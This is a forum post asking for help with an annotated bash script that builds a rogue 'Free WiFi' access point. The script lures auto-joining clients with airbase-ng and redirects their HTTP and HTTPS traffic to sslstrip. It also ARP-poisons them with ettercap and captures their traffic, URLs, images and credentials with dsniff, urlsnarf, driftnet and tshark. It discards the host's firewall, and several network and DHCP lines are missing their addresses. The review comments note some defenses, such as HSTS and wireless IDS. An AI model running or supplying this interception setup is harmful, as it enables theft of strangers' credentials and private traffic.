I was able to use this script without any issues in BT4 Final, but for some reason, clients won't associate to the fake access point it creates in R1 and R2. I am using the RTL8187 chipset (High Power Alfa). Any ideas???


# Flat script: brings up a software access point with airbase-ng, hands out
# DHCP leases on the resulting at0 interface, NATs client traffic out through
# an operator-chosen uplink, and starts several capture/interception tools
# against at0. There is no cleanup path: nothing below restores the firewall,
# resets ip_forward, or stops the background jobs when the script ends.
# NOTE(review): modprobe, iptables and the /proc write imply this runs as
# root - confirm.

# A timestamped directory name is built and created, but $LOGDIR is never
# referenced again in this listing; every log and capture file below is
# written to the current working directory instead.
LOGDIR="$(date +%F-%H%M)"
mkdir $LOGDIR

# SIGKILLs leftovers from an earlier run. The match is by process name only,
# so every unrelated `tail` (and any other listed tool) on the host dies too.
killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf tail 

echo 'Network Interfaces:'
ifconfig | grep Link
# Operator input is taken without validation and without `read -r`; the
# values are later expanded unquoted ($IFACE, $WIFACE), so whitespace or a
# leading '-' in the answer changes the arguments of the commands below.
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
# Cycle the wireless interface through airmon-ng and bring it back up.
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
ifconfig $WIFACE up

# Load the tun kernel module.
# NOTE(review): presumably needed for the at0 interface used below - confirm.
modprobe tun

# airbase-ng advertises the operator-supplied ESSID on the fixed interface
# name mon0. -P makes it answer probe requests for any ESSID and -C 30 also
# beacons the probed names for 30 seconds, so a client that auto-joins a
# remembered open network can attach without user action. On the client side
# the relevant controls are disabling auto-join for open networks and pruning
# the saved-network list; on the network side a wireless IDS can flag one
# BSSID answering for many ESSIDs.
# Only stdout goes to airbase.log; the xterm simply tails that file.
airbase-ng -e "$ESSID" -P -C 30 -v mon0  > airbase.log &
xterm -bg black -fg yellow -T airbase-ng -e tail -f airbase.log &

# Fixed wait; the script never checks that at0 exists before using it.
sleep 10

# The messages below say "airdrop-ng", but the only tool started above is
# airbase-ng. The `netmask` and `route add` lines carry no address operands
# in this listing (the values are absent from the page), so as shown they
# are incomplete commands.
echo Configuring interface created by airdrop-ng
ifconfig at0 up
ifconfig at0 netmask 
ifconfig at0 mtu 1400
route add -net netmask gw

# Flushes every rule and deletes every user chain in the filter and nat
# tables, i.e. the host's existing firewall policy is discarded and never
# restored. Then: masquerade traffic leaving via $IFACE, and redirect all
# TCP 80 and 443 arriving in PREROUTING (no -i restriction, so any inbound
# interface) to local port 10000.
# NOTE(review): port 10000 is presumably where sslstrip listens; it is
# started further down with no port option - confirm.
echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

# dhcpd.conf is generated in the current directory, overwriting any file of
# that name. The subnet, range, routers and domain-name-servers statements
# have no address values in this listing, so the file as written is
# incomplete.
echo Creating a dhcpd.conf to assign addresses to clients that connect to us
echo "default-lease-time 600;" > dhcpd.conf
echo "max-lease-time 720;"  >> dhcpd.conf
echo "ddns-update-style none;" >> dhcpd.conf
echo "authoritative;"  >> dhcpd.conf
echo "log-facility local7;"  >> dhcpd.conf
echo "subnet netmask {"  >> dhcpd.conf
echo "range;"  >> dhcpd.conf
echo "option routers;"  >> dhcpd.conf
echo "option domain-name-servers;"  >> dhcpd.conf
echo "}"  >> dhcpd.conf

# dhcpd3 stays in the foreground (-f) of a backgrounded job, bound to at0.
# The "DMESG" window actually tails the syslog file /var/log/messages.
# ettercap runs in text/quiet mode on at0 and logs to ettercap.log.
echo 'DHCP server starting on our airdrop-ng interface (at0)'
dhcpd3 -f -cf dhcpd.conf at0 &
echo "Launching DMESG"
xterm -bg black -fg red -T "System Logs" -e tail -f /var/log/messages &
echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
xterm -bg black -fg blue -e ettercap -T -q -p -l ettercap.log -i at0 // // &
sleep 8

# Kernel IPv4 forwarding is switched on only here, after the DHCP server and
# ettercap are already running, and is left enabled afterwards.
echo 'Configuring ip forwarding'
echo "1" > /proc/sys/net/ipv4/ip_forward

# Interception and capture tools, all bound to at0 and all left running in
# the background. sslstrip depends on the client's first request being plain
# HTTP; HSTS (in particular preloaded entries) and HTTPS-only browser modes
# remove that opening. dsniff.log, traffic.pcap and ettercap.log hold client
# traffic and any credentials seen, and are created in the working directory
# with the default umask.
echo 'Launching various tools'
sslstrip -a -k -f &
driftnet -v -i at0 &
xterm  -bg black -fg green -e urlsnarf  -i at0 &
dsniff -m -i at0 -d -w dsniff.log &
tshark -i at0 -w traffic.pcap &